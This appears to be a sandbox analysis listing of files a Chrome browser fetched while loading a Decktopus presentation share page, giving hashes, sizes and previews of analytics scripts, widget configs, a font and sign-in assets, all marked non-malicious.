                                                                                                                              SHA-256:ABFB079CD1BF6A97F4B90CE9A9C7BEDF6945DB715CCC7E78E45F1E695931AD9E
                                                                                                                              SHA-512:B23A91EB31F850CFDFEE05982BD8661EA313A1D45030BF17159D24D7750E575E4169176934D7A08B16A355B57176004B1CEF271EAA7507A77D90F51DC0109744
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://api.gleap.io/config/r5nfNhmzNkbIZ8AJbKfvpFxj7jQoAIHi?lang=en
                                                                                                                              Preview:{"flowConfig":{"newsMenuLabel":"News","checklistMenuLabel":"Onbarding","featureRequestsMenuLabel":"Roadmap","allConversationsMenuLabel":"Messages","knowledgeBaseMenuLabel":"Help","welcomeText":"How can we help?","replyTime":"within a few minutes","color":"#4f61ff","backgroundColor":"#FFFFFF","headerColor":"#4f61ff","buttonColor":"#485bff","borderRadius":21,"buttonX":20,"buttonY":20,"operatorAvatarImage":"https://staticfiles.gleap.io/gfeedback_widgets/PgHvs2cWga85lnPdmDdquQN2gl0fJtFUdkeFcKMXRUs6F3PGpaFzCgcGBXdYIn79JYVn02RhVgg.png","operatorName":"Deckto","logo":"https://staticfiles.gleap.io/gfeedback_widgets/Fv2CqD6OJES9uRcFsHGQ9aoGB816gu5RneGBUyJXZYD3tmKC2DElVUpQqLLpPvDoSBpepXo5bs0.svg","buttonLogo":"","customCSS":"","hideFeatureRequests":false,"hideNews":false,"hideAllConversations":false,"hideKnowledgeBase":false,"enableOpeningTimesBot":true,"openingTimes":[{"day":"Weekdays","openingTime":"09:00","closingTime":"17:00","replyTime":""}],"timezone":"Europe/Istanbul","showOnlineStatus":t
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32293)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):359627
                                                                                                                              Entropy (8bit):5.5552969186489625
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0F2737BAF7F8012B55722F15360FA6A7
                                                                                                                              SHA1:6E06C7BD928877ABF351E9A0AA1F07C80CF5D795
                                                                                                                              SHA-256:D3909A5A1ABFF7F3AB6F34E6382837F0B67BDC6FC143697D6917C01AA7C3A529
                                                                                                                              SHA-512:8A14FBE3505AE1C52A0F248A3AAE7AD9C2AE03D803C93A4EC1D1A55AB605D8E721DFF3C5F2203A07A2EBC776D6EA7936B34B6D6B7FF12D6C09D0366F9E912DD7
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-T26G8Z8
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"115",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17320
                                                                                                                              Entropy (8bit):5.756027257143914
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                              SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                              SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                              SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 20904, version 1.0
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):20904
                                                                                                                              Entropy (8bit):7.989703931752267
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:D459699D69AF3B24388D694EB4239795
                                                                                                                              SHA1:5AEC299F605D69A73B63BBEDF9167393F3927085
                                                                                                                              SHA-256:73D2E6AAAE336FAB2355978D228DC8B5BB32046023488290EE0559FD67AAB113
                                                                                                                              SHA-512:9EE3DC83F5EECDA2F345076E3AEE798A3420F6D68E400950D478AF0E2B4E72997777C64687DF4ECB6840A5D6F4E7117C32D4392357A25007AC5024CEE6C89677
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://app.decktopus.com/static/media/Sailec-Medium.d5050408323b1d11f631.woff2
                                                                                                                              Preview:wOF2......Q...........QF........................?FFTM..B..4....`..&.....d..9..l..6.$..T. ..S....D.5xn.w..@...%X0........42.l.....#...HNd.m.>...T.T.....:i.ZX.FGA..7$&...,....p....Wa.~.d....+s....g%....U..r.o~....n..?.;.f"..7X2x....?...6.'9y.'......./..E&2+..[PuJ.U\..,....<..)R.....J!.:o.q;...g.!.[7"'" .(bP......Q1..1*..*%ZR.UR...SyP).........sf.}.D......$......e....&I.......`..P../p......1..U}........W......L..9r....6...Y....#.W......n.G...V...:.z......:<e......u.E$.T.(.B....,S.]w.Ch.7.&.5..<..w'..........].......P`.*..P3.U.c..Z....}.E.....'E..>=O1.70r......tF...6.e...d@....L.4;.9V....c. ............]..Y-...(8..S]....VK20....A../. !...B.._..Y..A.;.....Z...Q..^.x.......OU..D.R..U.w...Md#.._.c?...O...5..h3d..i......l...oS]...(...M....,_w....rO..9+.$.,3..l. ..@..<.....:%[....f*1T...~.|.V.;.h.JH$.g......] F..^E..Cl+&....uo.[K...B:.!.P...Qw.M...3..E...5.g..w....ym......@...2...N_.........1`...QA.$,a....$..G.....^>...............].q.........$.....@
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (2665), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):2665
                                                                                                                              Entropy (8bit):5.845869641450831
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:9DA8A3B7299EE33EB0DC12F5253B97FC
                                                                                                                              SHA1:62EDEB0C343B23AED606FC0C1020203B10757022
                                                                                                                              SHA-256:85ED9F441C4813B40E8E15A6ADCB2413238BC5D33C60BC01C8F7FBF8829C57F1
                                                                                                                              SHA-512:B4B22BEEC2439D7C97EF05C301E1F7293CA52BFF52CD896ADAAAD957D1BF5C2BC754EA21CB3E4A7179DEE5386F56CA2ADE417C17DE1A1E10DBB45033487F661E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/10970373263/?random=1722285386633&cv=11&fst=1722285386633&bg=ffffff&guid=ON&async=1&gtm=45be47o0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1&dma=0&tag_exp=95250752&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FLFzs8Q%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=798213833.1722285385&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4
                                                                                                                              Preview:(function(){var s = {};(function(){var e={};/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var f=this||self;var g,k;a:{for(var l=["CLOSURE_FLAGS"],p=f,q=0;q<l.length;q++)if(p=p[l[q]],p==null){k=null;break a}k=p}var r=k&&k[610401301];g=r!=null?r:!1;var t,v=f.navigator;t=v?v.userAgentData||null:null;function w(d){return g?t?t.brands.some(function(a){return(a=a.brand)&&a.indexOf(d)!=-1}):!1:!1}function x(d){var a;a:{if(a=f.navigator)if(a=a.userAgent)break a;a=""}return a.indexOf(d)!=-1};function y(){return g?!!t&&t.brands.length>0:!1}function z(){return y()?w("Chromium"):(x("Chrome")||x("CriOS"))&&!(y()?0:x("Edge"))||x("Silk")};!x("Android")||z();z();!x("Safari")||z()||(y()?0:x("Coast"))||(y()?0:x("Opera"))||(y()?0:x("Edge"))||(y()?w("Microsoft Edge"):x("Edg/"))||y()&&w("Opera");var A=/#|$/;function B(d){var a=d.search(A),b;a:{for(b=0;(b=d.indexOf("fmt",b))>=0&&b<a;){var c=d.charCodeAt(b-1);if(c==38||c==63)if(c=d.charCodeAt(b+3),!c||c==61||c==38||c==35)b
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41104)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41107
                                                                                                                              Entropy (8bit):5.5047105590240815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:27F72D6A7532D7BA2AA40C6BC990B99B
                                                                                                                              SHA1:67628532FA41CDC7CDB49127B3184886A32BE72C
                                                                                                                              SHA-256:CB31BB53EEFEC5A74B7E7271ABD4E97E0735174D7D0B0DEC0F2217462573D1F1
                                                                                                                              SHA-512:5D6B845BDEB8D2661C4349F748B5879B5EDFE47B63922B93D6FA4E49BD0FDFEB7ED4A0D2F90CA08F3D0E1C46236CFDBA4132A4FB9A179AA7BEBF0113EC445E32
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (2591), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2604
                                                                                                                              Entropy (8bit):5.601930423198513
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:9E990BC59A087B3DEE1D1CDA0DBE31BA
                                                                                                                              SHA1:7A6E79751DADEC3CC6899FEEDB19038584069462
                                                                                                                              SHA-256:83E899AB88D696EF1BBB006928538341DCC7F55304A45B209B259AA67243C925
                                                                                                                              SHA-512:8240D28B6A6EAA00C9C4012B7483253B4474F74578BC9AC18B13E7338E5B9B8FC4AFD87AECC7C9EF3C3596C7183D5984550EBE1A5AA49BF7BCF6AB4AE44ECDCC
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:TFASC.trkCallback({"trc":{"si":"77bf2e3687c63f20bfedba759d6cfc9f","sd":"v2_77bf2e3687c63f20bfedba759d6cfc9f_f9f24db5-ca96-42cf-b35b-a3a4c18bf394-tuctda182cb_1722285388_1722285388_CNawjgYQx5JjGOrR1YGQMiABKAMw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiQgI6I5eeGxhBwAQ","ui":"f9f24db5-ca96-42cf-b35b-a3a4c18bf394-tuctda182cb","plc":"DESK","wi":"-280520419086403573","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1624391","cpb":"EhIyMDI0MDcyOC00LVJFTEVBU0UYASCc__________8BKhljaC50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmc4MDI4gPa5QUCRpA5I1aYPUNmI1wNY9QNjCI1aEPB6GDJkYwjXFhDVHxgjZGMIlhQQnxwYGGRjCNIDEOAGGAhkYwieaBCfhwEYPWRjCINuEOSNARg-ZGMIpCcQijUYL2RjCPQUEJ4dGB9keAGAAeIjiAHLmZDSAZABGJgB5eLVgZAy2wEQAdwB","evh":"-532537145","evi":{"50":"11533|15728","61":"13342|17311","62":"14083|18148","47":"5028|6794"},"vl":[{"ri":"423668c330373cd4ed329ab1eabee9f1","uip":"rbox-tracking","ppb":"CIMF","v":[],"ear":"false"}],"tslt":{"next-u
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (55466)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):55982
                                                                                                                              Entropy (8bit):5.356485260151869
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:EC770AE06E31DEDFD2C6AFB1C2E2D85F
                                                                                                                              SHA1:D327CF6FEF433839D7AF9B7D3204D279404167E7
                                                                                                                              SHA-256:055F91FE7B5AB083756BFD27A1859E9E00781737BF5C9DD5A8F09F83781681D2
                                                                                                                              SHA-512:5F00DBAE009A99000FCAC9480CAB2E13BFA0BA0F17A782D117126BB46962CEC4DDB73F3502774CDF5FAAA00B54DEB3409073495308BF11D9AEE6F826FB9683F8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:if (env.NR_APPID) {..;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]}};..;NREUM.loader_config={accountID:"4220971",trustKey:"4220971",agentID:env.NR_APPID,licenseKey:env.NR_LICENCE,applicationID:env.NR_APPID};.;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:env.NR_LICENCE,applicationID:env.NR_APPID,sa:1};.;/*! For license information please see nr-loader-spa-1.250.0.min.js.LICENSE.txt */.(()=>{var e,t,r={234:(e,t,r)=>{"use strict";r.d(t,{P_:()=>m,Mt:()=>b,C5:()=>s,DL:()=>A,OP:()=>D,lF:()=>O,Yu:()=>E,Dg:()=>v,CX:()=>c,GE:()=>x,sU:()=>N});var n=r(8632),i=r(9567);const o={beacon:n.ce.beacon,errorBeacon:n.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (65465)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):14791787
                                                                                                                              Entropy (8bit):4.945780243125567
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:C23B6CCF5B2423DDC2A944203ECC61DC
                                                                                                                              SHA1:261F8FE9B44CBB66E8AA8E87737C8CFC507A288B
                                                                                                                              SHA-256:0E6E1DAE5573B66086AAD9991822A6F827500AC850024F7ABA95DDF9BD9DEE2D
                                                                                                                              SHA-512:17D1D4BCEA8B66724A29324C378882D0C04202EE5A8A63E9A0A99A3C351E45C8341FCEAE3A2DDD0009F1947715D72CF990C1F04FF41D5E957A4C76E89DEAB63A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:/*! For license information please see main.a0530698.js.LICENSE.txt */.(()=>{var __webpack_modules__={29264:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/logo-full-white.e3aa76d0cb5afa8374ae13fd9c7e586c.svg"},39656:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/logo-icon-white.b831e833cc42254b19738eddbcfe2943.svg"},33710:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/pdf-import-white.5b71eeb8f60b1d0b9a31bb83608f919a.svg"},51321:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/pdf-import.31506d516d7cd2e372955615f827b6e8.svg"},88964:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/start-from-scratch.1208e43545fb852d86930f6a4f315e20.svg"},5611:(e,t,C)=>{"use strict";C.d(t,{Z:()=>i});C(28381);const i=C.p+"static/media/start-with-a-template.1cce44aa936c944f743c469281064edb.svg"},52950:(e,t,C)=>{"use strict";C.a(e,(async(e,i)=>{try{C.d(t,{Z:()=>g});C(28381)
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):5394
                                                                                                                              Entropy (8bit):5.02132077366372
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:4F7B68F1938342BCE0B7A9D1E858138D
                                                                                                                              SHA1:322C391549A4A9ECF081CBA5E7578D72753EEF05
                                                                                                                              SHA-256:AC56C9BC66EB400C208A554350C3C312943DA8D22F0D3BF3BB19A4F8C474C8EC
                                                                                                                              SHA-512:E9F67C8230CBCC0541195C42C4427C2FAABAA43833CDDF29F3D1886EAEF1AEB185DE79855117E7A08285E4D1F292152351E8F5E2EE183E3FABCE8C3B6E7D8952
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://app.launchdarkly.com/sdk/evalx/65dc8b71b13dd50fd060d125/contexts/eyJraW5kIjoidXNlciIsImtleSI6IlVTRVJfQU5OTVlTIiwibmFtZSI6IlVzZXIgQW5vbnltb3VzIiwiZW1haWwiOiJ1c2VyX2Fubm15c0BkZWNrdG9wdXMuY29tIn0
                                                                                                                              Preview:{"FE_110_LANGUAGE_SELECTION":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_112_UPGRADE_MODALS":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_120_ICON_FRAMES":{"flagVersion":10,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_124_AI_FLOW_FIX":{"flagVersion":6,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_13_CHANGE_FOLDER_DIALOG":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_161_LIST_FREEZE":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_170_PREVENT_TEXT_DRAG_ON_EDIT":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_178_INFINITE_ELEMENTS_BUG":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_186_TEXT_MENU_QUILL":{"flagVersion":5,"trackEvents":false,"value":true,"variation":0,"version":133},"FE_198_SAFARI_ISSUES":{"flagVersion":13,"trackEvent
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32293)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):360057
                                                                                                                              Entropy (8bit):5.555083084103113
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:ABE801E175418B3E9DFEC4A786EDF2F6
                                                                                                                              SHA1:301C048A033066BE83747024026F16CC727EAAD1
                                                                                                                              SHA-256:BC469114E79E8D9528AE6F40D7AAB517D5075E1F269DBEC0C7C6EEA3A7097FFE
                                                                                                                              SHA-512:B8D0715012FBD93C12D763E42DBE96E8839766BBBE95A9D27DCE5E7912089F773083A777AD81C294A89CD4F84E458953E8D593CDE440003DA4AD7B52DBB59B0E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=GTM-T26G8Z8
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"115",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (4179)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):269490
                                                                                                                              Entropy (8bit):5.543348124436096
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:05ACA7406FA4559CE8D738121D25BD90
                                                                                                                              SHA1:32A93D44FB26212C5043598EECF3530A76135F97
                                                                                                                              SHA-256:7258E6FE4DEDB60122C5E7F780BAD33FBC9F2F2E4575E0F98A434E267C09D2F1
                                                                                                                              SHA-512:2929804FD59EDC6EF1C642CEAAE70BB8295F87105D7FEC5436CAB5A56769E1B720D8BBCB043481FF15EA6EEEAF9822F471FB01069FE565EAF6E6E6AC67571986
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-10970373263","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd_ads_first","priority":5,"vtp_instanceDestinationId":"AW-10970373263","tag_id":11},{"function":"__ccd_pre_auto_pii","priority":3,"vtp_instanceDestinationId":"AW-10970373263","tag_id":9},{"function":"__ccd_em_form","priority":2,"vtp_includeParams":false,"vtp_instanceDestinationId":"AW-10970373263","tag_id":8},{"function":"__ccd_add_1p_data","priority":1,"vtp_acceptAutomatic":true,"vtp_acceptCode":true,"vtp_accep
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):404
                                                                                                                              Entropy (8bit):5.672611481268431
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:6EECC58AB487287DA17EB2B297FFA471
                                                                                                                              SHA1:209627F5B753D9E136EF740B766E5BD901641ECC
                                                                                                                              SHA-256:2E562FA09FF920774CEA55EE8C6D9E0F6280E3B103415F94DDBC53B46F4BB558
                                                                                                                              SHA-512:F74E2C210B3DEF50A091EA1085BF53B03D7AC38E9317792F4265F72335B4B9C7B81AEDB02EB0E9E6BC25A243405270B4D64D76FE6D05752372C4000611C68088
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:window.env = {. "BASE_URL": "https://apiv21.decktopus.com/api/",. "NR_LICENCE": "NRJS-43e56c8b880ca8453b7",. "NR_APPID": "1134428518",. "ENV_NAME": "PROD",. "POSTHOG_API_KEY": "phc_EPRVh4HnMtsZmdGbBkiWbbXjOHbrZDqmCA637H2IYwz",. "LD_SDK_KEY": "65dc8b71b13dd50fd060d125",. "SHARE_URL_BASE": "decktop.us",. "CNAME_URL": "cname.decktopus.com",. "GLEAP_API_KEY": "r5nfNhmzNkbIZ8AJbKfvpFxj7jQoAIHi".};
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (44174)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):44175
                                                                                                                              Entropy (8bit):5.377319969401598
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:BE3098870E0BB50A40341B9B2B42753B
                                                                                                                              SHA1:0759A117A43C8D5FCDCBC63EC9E1BAFB81F5C460
                                                                                                                              SHA-256:25B1F543C4682618E2FFF0C607D70A896ECFC080CE500C41CE00B7FFAD0EC411
                                                                                                                              SHA-512:112FDBB12458B051AA2F70A7DA82B2237A599FD2F820A53E406CE9DF1B6A965EF79C2F4875EAB498ED2FF4BEE184B46E857FBB520950E1A39D59F8FDC7A66F00
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/8c81cb09042c/api.js
                                                                                                                              Preview:"use strict";(function(){function Rt(e,n,r,o,c,u,y){try{var _=e[u](y),d=_.value}catch(p){r(p);return}_.done?n(d):Promise.resolve(d).then(o,c)}function It(e){return function(){var n=this,r=arguments;return new Promise(function(o,c){var u=e.apply(n,r);function y(d){Rt(u,o,c,y,_,"next",d)}function _(d){Rt(u,o,c,y,_,"throw",d)}y(void 0)})}}function F(e,n){return n!=null&&typeof Symbol!="undefined"&&n[Symbol.hasInstance]?!!n[Symbol.hasInstance](e):F(e,n)}function Ie(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}function Oe(e){for(var n=1;n<arguments.length;n++){var r=arguments[n]!=null?arguments[n]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Ie(e,c,r[c])})}return e}function gr(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (51734)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):222931
                                                                                                                              Entropy (8bit):5.0213311632628725
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                              SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                              SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                              SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
